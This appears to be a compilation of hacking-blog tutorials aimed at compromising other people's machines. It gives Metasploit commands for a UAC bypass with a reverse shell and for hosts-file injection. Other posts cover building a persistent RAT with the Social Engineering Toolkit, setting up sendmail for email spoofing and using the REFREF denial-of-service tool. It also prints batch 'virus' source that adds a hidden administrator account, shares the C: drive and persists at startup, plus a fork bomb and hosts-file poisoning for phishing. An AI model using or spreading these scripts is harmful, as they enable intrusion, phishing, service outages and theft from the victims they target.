D.N.S. poisoning using metasploit.

Today we will edit hot file of the Remote P.C which has been compromised. By editing Host file you can Redirect any website to any I.P address. Absolutely we will use metasploit.

(1)Hack remote p.c .(How to hack Remote P.C.?)

(2)Now we will Bypass U.A.C. protection of windows.

(3)Open Terminal & type following code in terminal

msfconsole

use exploit/windows/local/bypassuac
set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

set session 1

exploit

(4)Now we will edit host file.

msf >use post/windows/manage/injet_host

msf post(injet_host) >set domain www.google.com

msf post(injet_host) >set ip Your Desired I.P.

msf post(injet_host) >set session 2

msf post(injet_host) >exploit

This will Redirect google.com in victim p.c to your desired I.P.

How to use R.A.T. through S.E.T?

RAT is Remote Administration tool , using RAT you can control Remote P.C. ,there are lots of software available for RAT , but they are made from hackers, there is possibility of back-door in that readily available software. So today we use RAT through Social engineering toolkit(SET).

(1)Open your terminal & type

cd /opt/set

./set

(2)update your set

(3)Now select option 3 which is Third party Modules

(4)Now select option 2 which is RATTE (Remote administration tool tommy edition).

(5)Enter I.P. Address of your computer to connect back

(6)Port RATTE Server should listen on [8080]: press enter

(7)Should RATTE be persistent [no|yes]?:yes

(8)Use specifix filename (ex. firefox.exe) [filename.exe or empty]?:cool.exe

(9) Payload has been exported to src/program_junk/ratteM.exe

How to install & configure send mail in Ubuntu?

Send mail is program which will help you to send email through command, you can send email from terminal or CMD . In this program we use our machine as a server. I will show you how to install & configure Send-Mail. So we can spoof email to targets. But problem is that this email is detected as spam due to automatic sending through machine.

How to Install Send-Mail?

Open terminal & type following command in terminal.

sudo apt-get install mailutils
sudo apt-get install sendmail

How to configure it?
After installing sendmail , you should configure sendmail. It`s little hard. But don`t worry after that we can spoof email to anyone.
Type following command on terminal
sudo gedit /etc/mail/sendmail.mc
It will open sendmail.mc file.
For example your last two lines are as follow
MAILER(`local')dnl
MAILER(`smtp')dnl
Put this code before that two lines.
MAILER_DEFINITIONS
define('SMART_HOST',`smtp.gmail.com')
Ok. now close that file
Now we will generate configure file from .mc file so type following command in terminal.
sudo bash -c 'cd/etc/mail/ && m4 sendmail.mc >sendmai.cf'
Now everything is complete, try to send mail using terminal or use Social Engineering Tool-Kit as i mention in previous post. 

How to install social engineering toolkit(S.E.T.) in ubuntu?

Social Engineering Tool kit is cool tool which found in BACKTRACK, this increase power of metasploit. If you are on any linux system other than BACKTRACK , then you can install it in UBUNTU.

Extra package which is necessary to use SET effectively are as follow.

(1)Metasploit:- You can see my old post about how to install metasploit in ubuntu here.

(2)Ettercap:- If you are on any network & want to attack on network like Man in the Middele Attack or DNS poisoning then you require it.

To install Ettercap open terminal in type following command:-

sudo apt-get install ettercap

(3)Openjdk-6-It`s necessary program to use SET. Just type following command in terminal

sudo apt-get install openjdk-6-jdk

Now open terminal & change directory to opt.
sudo bash
cd /opt
svn co http://svn.secmaniac.com/social_engineering_toolkit set/
cd /opt/set
svn update
nano config/set_config

Download Free E-books about Hacking

Hello Friends, If you want to learn more about Hacking & Computer Security , then you can comment here & Put your Email address in Comment Box. I will send you Different e-books about Hacking & Computer Security.

List of Books are as follow.

(1)CEH(Certified Ethical Hackers)2010V6.

(2)Hacking Wireless Networks For Dummies.

(3)h gray hat hacking.

(4)Blind_SQLInjection.

(5)backtrack-4-assuring-security-by-penetration-testing.

(6)Collections of Ankit Fadia Hacking Book.

(7)Secrets of Reverse Engineering.
(8)Social Engineering toolkit
(9)Ethical Hacking and Countermeasures- Web Applications and Data Servers.

How to use REFREF?

As we know in past , famous Hacktivist group Anonymous carried out series Of DDOS attack in number of websites like paypal ,master-card ,visa. At that time they used tool LOIC for down the website.

Although they got success in their project ,but due to LOIC some of hackers arrested later. So they decide to build new weapon for DOS attack.

It was REFREF. It is programmed in perl ,java ,python.

But main requirement is URL must be vulnerable to SQL injection. It mean if you found website which is vulnerable to SQL injection , then by using this tool you can easily down website.

You can Download REFREF SCRIPT from here.

How to use?

It`s pretty simple. Just open terminal change path & Execute script.

cd Downloads

perl refref.pl vulnerable URL

It will down website in short time. This tools is very effective , 17 second attacks from single machine resulting down 42 min outage on pastebin.

Batch File Virus -4

@echo off

cd\

cd %SystemRoot%\system32\

md 1001

cd\

cls

rem N0 H4rm 15 cau53d unt1| N0w

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000

echo 12:00:00.00 | time >> nul

echo 01/01/2000 | date >> nul

net users Microsoft_support support /add

rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.

net localgroup administrators Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3

net share system=C:\ /UNLIMITED

cd %SystemRoot%\system32\1001

echo deal=msgbox (”Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) >

%SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )

mode con rate=1 > nul

mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3×4ct|y

@ 12:01 and 12:02

at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >>

nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3×3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5

copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All

Users\Start Menu\Programs\Startup\warnusr.vbs”

rem

***************************************************************************

Batch File Virus -3

Most of them have heard about the word ‘fork()’, which is used to create child process, like wise fork bombing is nothing but calling a program by itself again and again with a infinite loop and making the system to crash by popping up hundreds of windows on the screen.

@echo off

:loop

Explorer

Call fork.bat

Goto loop

Copy the above program and paste it in a notepad file and save it as ‘fork.bat’. The explorer command will open up the ‘documents’ directory, and it is given inside a loop, then the same batch file is called again which in turn opens up multiple documents rolled out in a loop, likewise it goes on by calling the program itself again and again until the system crashes or hangs up. 

Batch file virus -2

Batch program offers its programmers to create their custom viruses just by

misusing the way the command works, which leads to the creation of batch viruses. In this chapter we are going to learn about the dark-side of the batch by learning how to misuse commands to create batch viruses.

Folder Replicator Virus:

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again and again and keeps on creating a folder with same name, until a user stops it.

1. Just open up a notepad, copy and paste the below code

cd\

cd C:\Documents and Settings\username\Desktop

:loop

md Virus

cd Virus

goto loop

2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by changing the place where it says ‘username’ and instead of that replace it by the currently logged in username.

3. Then run it on the Victims computer to infect it.

4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.

Once more thing that you have to notice is that, this will create directory inside another directory with the same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over deleting the root directory will purge all the clumsy thing done by this piece of code. 

DNS poisoning using BATCH File

Batch file programming is the native programming offered by the Microsoft Windows Operating System. Batch file is created using any text editors like notepad, WordPad, WinWord or so on, which comprises of a sequence of built-in commands used to perform some often done tasks like deleting a series of files of same type or of different type, creating logs, clearing unwanted craps from your computer and even for creating a batch VIRUS.

DNS poisoning:

Batch file can has the tendency to modify the transfer zones by editing the hosts.txt file that resides inside ‘C:\windows\system32\drivers\etc\hosts.txt’, so that it will take you to some malicious websites instead of landing you to the legitimate website. This may also be used for phishing, i.e. redirecting you to a bogus website which looks exactly like the legitimate one, and then steal credentials.

1. Just open up a notepad, copy and paste the below code

@echo off

echo 10.199.64.66 www.google.com >> C:\windows\system32\drivers\etc\hosts.txt

echo 10.199.64.67 www.paypal.com >> C:\windows\system32\drivers\etc\hosts.txt

exit

How to scan web-server with Nikto?

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6500 potentially dangerous files/CGIs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as an overly stealthy tool. It will test a web server in the quickest time possible, and is fairly obvious in log files. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

how to Browser Autopwn attack in metasploit?

In this article we will examine the effectiveness of metasploit browser autopwn module.The basic idea behind that module is that it creates a web server in our local machine which will contain different kind of browser exploits.When the user will open the malicious link then the execution of the exploits will start against the browser of the user and if one of the exploits is successful a meterpreter session will open.

In order to use this attack we have to open the metasploit framework and to use the browser_autopwn module.In the next image you can see the available options and default settings for this module.

How to crack wi-fi password in ubuntu?

For this purpose we are going to use Ubuntu. First we have to install air-crack program in o.s

(1)install aircrack

sudo apt-get install aircrack-ng

(2) You need to go in root first. For this purpose type “su –“ and type your password.

(3)now type following command in terminal

Code:

# iwconfig wlan0 mode monitoring

Note: If some sort of error occurs type “# iwconfig” in a terminal to check for your wireless.

(4)After that it’s time to scan for a wireless network which we will compromise with educational purpose. This time we will use the command:

Code:

# airodump-ng wlan0

How to exploit VSFTPD ?

VSFTPD, which stands for "Very Secure FTP Daemon"[1], is an FTP server for Unix-like systems, including Linux.

VSFTPD is an FTP server that it can be found in unix operating systems like Ubuntu, CentOS, Fedora and Slackware. By default this service is secure however a major incident happened in July 2011 when someone replaced the original version with a version that contained a backdoor. The backdoor exists in the version 2.3.4 of VSFTPD and it can be exploited through metasploit.

So first we scan port 21 is it vsftpd 2.3.4 or not, for this purpose you can use nmap.

So let’s assume that we have scanned a host and we have discovered the version 2.3.4 of VSFTPD running on the system.

We can open the metasploit framework in order to search for the vsftpd module.

As we can see there is only one module that we can use. So we will start the configuring the module appropriately. In the next screenshot you can see the configurations that we need to do in this exploit in order to be executed successfully.